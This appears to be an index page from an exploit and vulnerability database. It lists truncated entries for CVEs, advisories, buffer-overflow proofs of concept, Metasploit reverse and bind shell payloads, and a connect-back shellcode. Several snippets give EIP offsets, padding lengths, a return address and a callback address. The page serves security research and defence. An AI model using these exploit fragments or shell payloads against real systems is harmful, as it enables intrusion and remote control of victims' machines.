php: exif_read_data crash on corrupted JPEG files

The exifreaddata function in the Exif module in PHP before 5.2.10 allows remote attackers to cause a denial of service crash via a malformed JPEG image with invalid offset fields, a different issue than CVE-2005-3353...

Mini-Stream Buffer Overflow

!/usr/bin/python ...:| Code Fix/Patch for WinXP - English |:... Referenced: http://www.exploit-db.com/exploits/10745 - mrme and fixed the offset as well as tested the exploit against WinXP SP2 and SP3 Exploit against Mini-Stream 3.0.1.1 WinXP English 12.27.2009 Author: Ron Henry -...

Mini-Stream Exploit for Windows XP SP2 and SP3

Exploit for unknown platform in category local exploits ============================================== Mini-Stream Exploit for Windows XP SP2 and SP3 ============================================== Title: Mini-Stream Exploit for Windows XP SP2 and SP3 CVE-ID: OSVDB-ID: Author: Ron Henry Published:...

Mini-stream Ripper (Windows XP SP2SP3) - Local Overflow

Mini-stream Ripper Windows XP SP2SP3 - Local Overflow !/usr/bin/python ...:| Code Fix/Patch for WinXP - English |:... Referenced: http://www.exploit-db.com/exploits/10745 - mrme and fixed the offset as well as tested the exploit against WinXP SP2 and SP3 Exploit against Mini-Stream 3.0.1.1 WinXP...

Easy RM to MP3 2.7.3.700 - Local Buffer Overflow

!/usr/bin/python Exploit for against Easy RM to MP3 2.7.3.700 12.2.2009 Author: Ron Henry - [email protected] - dijital1 Version: Easy RM to MP3 2.7.3.700 Tested against WinXP SP3 - English outputfile = "astley.m3u" shellcode="A" 26071 Offset to EIP - Windows XP SP3 shellcode+="\x25\x96\xa0\x7c"...

Microsoft Excel Shared Feature Header Pointer Offset Memory Corruption Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Office Excel. User interaction is required to exploit this vulnerability in that the target must open a malicious spreadsheet. The specific flaw exists in the handling of Shared Feature...

Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow PoC

No description provided by source. / Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC By fl0 fl0w "can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!" / The EIP offset is at 312 bytes 0x138 HEX After you compile and create the .MOR file ,edit it with HEX EDITOR and...

Mozilla Firefox 2.0.0.16 UTF-8 URL Remote Buffer Overflow Exploit

No description provided by source. !/usr/bin/python FireFox 2.0.0.16 Windows XP SP3 x86 Remote Exploit Author: Dominic Chell [email protected] Exploits the UTF-8 URL overflow vulnerability described in CVE-2008-0016. As of September 2009 there are no public exploits for this vulnerability...

Portable E.M Magic Morph 1.95b Buffer Overflow

/ Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC By fl0 fl0w "can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!" / The EIP offset is at 312 bytes 0x138 HEX After you compile and create the .MOR file ,edit it with HEX EDITOR and start counting from the start of t...

Portable E.M Magic Morph 1.95b - .MOR File Stack Buffer Overflow

Portable E.M Magic Morph 1.95b - .MOR File Stack Buffer Overflow / Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC By fl0 fl0w "can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!" / The EIP offset is at 312 bytes 0x138 HEX After you compile and create the .MOR fil...

Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow PoC

Exploit for unknown platform in category local exploits ================================================================== Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow PoC ================================================================== / Portable E.M Magic Morph 1.95b .MOR Fi...

Windows x64 Command Shell, Reverse TCP Inline

Connect back to attacker and spawn a command shell Windows x64 This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 460 include Msf::Payload::Windows include Msf::Payload::Single includ...

ProjectButler 1.5.0 Remote File Inclusion

projectbutler - 1.5.0 offset RFI Vulnerability Author: cr4wl3r Contact: cr4wl3r4tlinuxmaildotorg Download: http://sourceforge.net/projects/projectbutler/files/projectbutler/1.5.0/ProjectButler.tar.gz Vuln : requireonce$offset."class.project.inc"; PoC :...

ProjectButler 1.5.0 (pda_projects.php offset) RFI Vulnerability

Exploit for unknown platform in category web applications =============================================================== ProjectButler 1.5.0 pdaprojects.php offset RFI Vulnerability =============================================================== projectbutler - 1.5.0 offset RFI Vulnerability...

Millenium MP3 Studio 1.0 .mpf File Local Stack Overflow Exploit #2

Exploit for unknown platform in category local exploits ================================================================== Millenium MP3 Studio 1.0 .mpf File Local Stack Overflow Exploit 2 ================================================================== + Vulnerability : .mpf File Local Stack...

Mandriva Linux Security Advisory : pidgin (MDVSA-2009:147)

Security vulnerabilities has been identified and fixed in pidgin : Buffer overflow in the XMPP SOCKS5 bytestream server in Pidgin formerly Gaim before 2.5.6 allows remote authenticated users to execute arbitrary code via vectors involving an outbound XMPP file transfer. NOTE: some of these detail...

Foxit Reader JPEG2000 / JBIG Decoder Add-On < 2.0.2009.616 Multiple Vulnerabilities

The Foxit Reader application installed on the remote Windows host includes an optional JPEG2000 / JBIG Decoder add-on that is prior to version 2.0.2009.616. It is, therefore affected by multiple vulnerabilities : - A out-of-bounds read error exists in the add-on due to improper handling of a...

OS X (vfork) Command Shell, Bind TCP Inline

Listen for a connection, vfork if necessary, and spawn a command shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 152 include Msf::Payload::Single include Msf::Payload::Osx...

Linux/x86 - connect-back &quot;11.22.33.44&quot;,31337/tcp - 90 bytes

No description provided by source. /--------------------------------------------------------------------------- 90 byte Connect Back shellcode by Russell Sanford - [email protected] --------------------------------------------------------------------------- filename: x86-linux-connect-back.c info:...

CVE-2008-6189

SQL injection vulnerability in GForge 4.5.19 allows remote attackers to execute arbitrary SQL commands via the offset parameter to 1 new/index.php, 2 news/index.php, and 3 top/topusers.php, which is not properly handled in database-pgsql.php...